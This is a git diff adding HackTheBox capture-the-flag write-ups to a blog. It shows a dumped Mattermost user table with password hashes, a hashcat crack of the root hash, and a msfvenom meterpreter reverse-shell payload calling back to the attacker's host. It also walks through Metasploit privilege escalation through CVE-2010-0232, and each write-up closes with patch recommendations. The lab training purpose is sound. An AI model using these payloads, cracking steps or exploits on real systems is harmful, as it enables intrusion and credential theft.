++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
+| Id                         | CreateAt      | UpdateAt      | DeleteAt | Username                         | Password                                                     | AuthData | AuthService | Email                   | EmailVerified | Nickname | FirstName          | LastName | Position | Roles                    | AllowMarketing | Props | NotifyProps                                                                                                                                                                  | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone                                                                                   | MfaActive | MfaSecret |
++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
+| 64nq8nue7pyhpgwm99a949mwya | 1608992663714 | 1608992663731 |        0 | surveybot                        |                                                              | NULL     |             | surveybot@localhost     |             0 |          | Surveybot          |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1608992663714 |     1608992663731 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
+| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 |        0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL     |             | 4120849@delivery.htb    |             0 |          |                    |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609844799823 |                 0 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
+| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 |        0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL     |             | 7466068@delivery.htb    |             0 |          |                    |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609844806814 |                 0 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
+| 7z9izpo1wfrnddytkm8815wg4w | 1647894531289 | 1647894703010 |        0 | azerty                           | $2a$10$Dwc/LdQGFD0PdJrmLwD07uTbZE1CfpswRJCMsoGKeJHKtn4/LIPW. | NULL     |             | 3998604@delivery.htb    |             1 |          |                    |          |          | system_user              |              1 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1647894531289 |                 0 |              0 | en     | {"automaticTimezone":"America/New_York","manualTimezone":"","useAutomaticTimezone":"true"} |         0 |           |
+| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 |        0 | root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL     |             | root@delivery.htb       |             1 |          |                    |          |          | system_admin system_user |              1 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609157893370 |                 0 |              0 | en     | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"}   |         0 |           |
+| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 |        0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL     |             | 9122359@delivery.htb    |             0 |          |                    |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609844805777 |                 0 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
+| jing8rk6mjdbudcidw6wz94rdy | 1608992663664 | 1608992663664 |        0 | channelexport                    |                                                              | NULL     |             | channelexport@localhost |             0 |          | Channel Export Bot |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1608992663664 |                 0 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
+| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 |        0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL     |             | 5056505@delivery.htb    |             1 |          |                    |          |          | system_user              |              0 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609844789048 |                 0 |              0 | en     | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"}                 |         0 |           |
++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
+8 rows in set (0.000 sec)
+```
+In this table I find the hash of the user, I recover it and launch `hashcat` to crack it:
+
+
+```bash
+hashcat.exe -m 3200 hash.txt pass.txt -r rules/best64.rule
+hashcat (v6.2.5) starting
+[...]
+Hashes: 1 digests; 1 unique digests, 1 unique salts
+Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+Rules: 77
+
+Optimizers applied:
+* Zero-Byte
+* Single-Hash
+* Single-Salt
+
+[...]
+
+Dictionary cache hit:
+* Filename..: pass.txt
+* Passwords.: 1
+* Bytes.....: 17
+* Keyspace..: 77
+
+$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
+
+[...]
+```
+💡To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time.I find the `PleaseSubscribe!21` password so I can now change the user to root and get the last flag.
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Disable account creation on Matermost
+- Do not send a clear password in conversations
+- Do not use the root password on other services/for other users
+- Use complex passwords
diff --git a/content/writeup-ctf/writeup-devel-htb/featured.png b/content/writeup-ctf/writeup-devel-htb/featured.png
new file mode 100644
index 0000000..7549676
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b07b596f0884e42218d26c85f34c5597ba8d8550c98909073c3f4ebac12fcef2
+size 264178
diff --git a/content/writeup-ctf/writeup-devel-htb/featured.webp b/content/writeup-ctf/writeup-devel-htb/featured.webp
new file mode 100644
index 0000000..67e28c2
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cfcb5ec28db1d22d860b5ac6aa40d0de2c4fd7ad30ce600fb7786e28319fc968
+size 28504
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.png b/content/writeup-ctf/writeup-devel-htb/img/image-1.png
new file mode 100644
index 0000000..b24dbdd
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c9971d86a22c91e29fc54bf15b7c86f08bba62dc1223f68dd0291f3bcc4608b3
+size 34053
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.webp b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp
new file mode 100644
index 0000000..860454d
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a870b5e62fbc6a8c590b6eff3753495b978cf5cb4ecdafd75168defdf035189b
+size 31926
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.png b/content/writeup-ctf/writeup-devel-htb/img/image-2.png
new file mode 100644
index 0000000..bb55ca5
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6ee4219aec1d3c4658a830d5c5695e0eb72c8527ae912e36a53d333b63f899d1
+size 270053
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.webp b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp
new file mode 100644
index 0000000..c5bfd22
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e743eb6604bbdf14cf343a8979d515bc907dc6e5bea6a051915ab2296d3b17e5
+size 22534
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.png b/content/writeup-ctf/writeup-devel-htb/img/image-3.png
new file mode 100644
index 0000000..2da01ce
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ebdfa8162e394ed0a0fb48b4375619a31cb6e0df14b037e76b98eb1d592e66cc
+size 26161
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.webp b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp
new file mode 100644
index 0000000..4b97f19
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e0e8cc572cd8804b21634a7fc704c1d06d0ed4292b630348add66533cb85a58d
+size 28084
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.png b/content/writeup-ctf/writeup-devel-htb/img/image-4.png
new file mode 100644
index 0000000..9449455
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8ac67e6c1ef6f032b4b1b8056ed033665aeb27c46fb97a9e07d73f4f46c93f8b
+size 50008
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.webp b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp
new file mode 100644
index 0000000..6eb2f6b
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ba8c917a1b476e9e887170e609e6448946843d29a3471ba996fa944f5549357a
+size 45758
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.png b/content/writeup-ctf/writeup-devel-htb/img/image-5.png
new file mode 100644
index 0000000..3427ba1
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9b11ea53fd4b83e13861601723e90c3360c4cda00249327c423dacf9acfe6df7
+size 67853
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.webp b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp
new file mode 100644
index 0000000..4aef72e
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:789160158ced23789b850d1bd2d8f9d8d9e21492517ba314bd988ec380ddf580
+size 81996
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.png b/content/writeup-ctf/writeup-devel-htb/img/image-6.png
new file mode 100644
index 0000000..c75d9b8
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e07b654f84970e5efc61fbca2df742f136f6601c187cbb8839c51310f60de898
+size 14620
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.webp b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp
new file mode 100644
index 0000000..13c90ba
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:eec38bdbcb6ac2f1153abb2b57dcf97b0a983802bfcd59f33492ed6703677d32
+size 15820
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.png b/content/writeup-ctf/writeup-devel-htb/img/image-7.png
new file mode 100644
index 0000000..4210f07
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f5f19166c3e44fcf3d4560e0816fb3fa6d6b6c420ee697e4d39914c1c465024e
+size 36563
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.webp b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp
new file mode 100644
index 0000000..c3fa9bd
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:35fe2fad9d335311e46700d95df3d15e871daad5dedc2132cf80863605df9378
+size 35924
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.png b/content/writeup-ctf/writeup-devel-htb/img/image-8.png
new file mode 100644
index 0000000..d539953
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:44aa401da6b330d9175ca299fba9c5c46400d07554b4d6baf7e66ef9ae731b3f
+size 8233
diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.webp b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp
new file mode 100644
index 0000000..cbf93bc
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c6e6959df3fd4801b88b6a131a4ebaebde30de79c39ea6f1c7fd8db438f0e9d7
+size 11526
diff --git a/content/writeup-ctf/writeup-devel-htb/index.md b/content/writeup-ctf/writeup-devel-htb/index.md
new file mode 100644
index 0000000..c62d179
--- /dev/null
+++ b/content/writeup-ctf/writeup-devel-htb/index.md
@@ -0,0 +1,101 @@
+---
+title: "Writeup - Devel (HTB)"
+date: 2022-04-06
+slug: "writeup-devel-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.5
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP (ftpd)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+I start by seeing if it is possible to connect to FTP as `anonymous`:
+
+![](img/image-3.webp)
+
+In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:
+
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
+```
+I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.
+
+![](img/image-4.webp)
+
+I then access my previously uploaded payload at the following address:
+
+
+```bash
+http://10.10.10.5/shell.aspx
+```
+I now have a reverse shell on the machine.
+
+## Privilege escalation
+
+I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.
+
+
+```bash
+use post/multi/recon/local_exploit_suggester
+set SESSION 19
+exploit
+```
+The module has found a number of potential exploits.
+
+![](img/image-5.webp)
+
+I start by testing the first one:
+
+
+```bash
+use windows/local/bypassuac_eventtvwr
+set SESSION 19
+exploit
+```
+![](img/image-6.webp)
+
+But without success. I test the second one:
+
+
+```bash
+use windows/local/ms10_015_kitrap0d
+set SESSION 19
+exploit
+```
+![](img/image-7.webp)
+
+This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization. 
+
+The module `MS10_015` is linked to CVE-2010-0232.
+
+
+> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/)
+
+I can now get both flags back.
+
+![](img/image-8.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Disable writing to the FTP server as `anonymous`
+- Update Windows to patch CVE-2010-0232
diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.png b/content/writeup-ctf/writeup-devzat-htb/featured.png
new file mode 100644
index 0000000..ff24998
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:144600e92936143f0fe608db542b95f4381f92909e17c643c18f6667e6f07943
+size 281336
diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.webp b/content/writeup-ctf/writeup-devzat-htb/featured.webp
new file mode 100644
index 0000000..3bd8615
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9808b0b466c9762b7b349334f1781988859af6841008e21c63053024b0295eae
+size 31188
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.png b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png
new file mode 100644
index 0000000..b4972c1
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e15e9e79e955e6ee8a75ec685ae92f21c83e903e85a214b0f069e294f0ce9384
+size 64014
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp
new file mode 100644
index 0000000..00bda40
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3cbb9260a766aa3f13ed9f97a8bea560b5bf19f6ee32afbdfad1a197ff3d8307
+size 52534
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.png b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png
new file mode 100644
index 0000000..bfee383
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:777783cd86154934fc935c9d9a67c8d20aa51cf6eee9219a42017b633246f243
+size 114335
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp
new file mode 100644
index 0000000..bd5fe51
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:eb00365a298976759d8d69ee34e96d03202e49b29e9257fe2e25df3c64e92be1
+size 80786
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.png b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png
new file mode 100644
index 0000000..a3b4948
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bf71e8c0e877da9776fe1160d0f4ce61be5edb3e08a4e64d62fecfa645e6df07
+size 58946
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp
new file mode 100644
index 0000000..777c18f
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ee7a8ace3ec07d9d266a45ccdcf649865acafa97d01178c801d2330d1e0513bf
+size 43894
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.png b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png
new file mode 100644
index 0000000..f069773
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b7c042a328f0a91533f110ee27898408da3638fadb60fd2a9539718c918b7f39
+size 18289
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp
new file mode 100644
index 0000000..0e44171
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9ca494592b5f6f76d699a3bbcbcbcab65fa986794854a06e113282fc55d3d374
+size 13576
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.png b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png
new file mode 100644
index 0000000..7f8cdfe
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:04483aff847e9ce6169d33c2a43cd26c80b4133197e3f11d972f467fb905dc20
+size 38467
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp
new file mode 100644
index 0000000..cc43837
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:989c9ac54bc2c88eb6d1df43109849fa5937e9c77ee991055fb14545b10ab920
+size 33548
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.png b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png
new file mode 100644
index 0000000..5a24ce1
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f4ec696ca7c83a5a82fbdf3d9d4daa87d541ead3f75f5b283b9a0bbd8ec09f3d
+size 41992
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp
new file mode 100644
index 0000000..a293c27
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9ac88a341dbc05c5efc31fb211e298fe37f737606a17e9d8c70023896f8d4b31
+size 36794
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.png b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png
new file mode 100644
index 0000000..e30ea8a
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fd0b620e2c1049dda53d54280dada89f6f6f1957782d80ecf4bbc65b450e1da1
+size 25129
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp
new file mode 100644
index 0000000..5cb06b8
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0feb3ab966750a2f236968b4be98bfebebda6cc73723db4bf0ccf9209781152d
+size 20074
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.png b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png
new file mode 100644
index 0000000..68f83a8
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e08b21c2343be3b884f8ab99e101e2994a3adac370c20fd884988685436eaf63
+size 33596
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp
new file mode 100644
index 0000000..3927b79
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ad63e384624e7538e97b7a88636952dbd0a87527a839f0de4c915000ebe821ed
+size 24386
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.png b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png
new file mode 100644
index 0000000..1a49eab
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff78724b302de739a495f8ca809cbc9f62e59138b2aaf6e41d45e755f09816d3
+size 32643
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp
new file mode 100644
index 0000000..7fb0192
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c8b222bc2ca11b707f370a64152da153e826586c21dde35d1af210506c3e7311
+size 24754
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.png b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png
new file mode 100644
index 0000000..1738962
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:038c2c776267e011be9fcb47391aee030af615e4c9ddc6fc4bf70f6c2494f44e
+size 42126
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp
new file mode 100644
index 0000000..9532dff
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:23acbb9827aa67cf2acb1ada2da9b840961b8cb6a159a4d58c331c500e7b64e6
+size 26476
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.png b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png
new file mode 100644
index 0000000..1be090d
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b9182ef227ee64d322a8407b0908043af2be2b30700b8b4854fab6b1e3fbe01b
+size 33266
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp
new file mode 100644
index 0000000..6248184
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:968437b132c627dac8667448b0078f0e218a0e9dd6d9a279e22fbb1f1bf68e54
+size 19268
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.png b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png
new file mode 100644
index 0000000..3dd4f5e
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:73836c6a67e3f964d5e613f53fd535b8c3f7031622aa04eeb388720054a4c939
+size 382990
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp
new file mode 100644
index 0000000..6931efb
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8761d03d1f8acf2d43242e72249a01493f8f026cbe6d053607eba739298492c
+size 39704
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.png b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png
new file mode 100644
index 0000000..ae54afa
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3806d9fe10d74312281d70c149fa73d631f8ca6d5c0ac7f25fc4cda132af52fc
+size 12982
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp
new file mode 100644
index 0000000..bb88016
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:79907fee20a0786dcdf92785d2728a3254b4bf7a532f56f4dea85644a351c014
+size 8882
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.png b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png
new file mode 100644
index 0000000..9a5b6c4
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:347087792a51be8eab6033604d223e9ae3fd18ee205ad1073b0d5dee9c9e330e
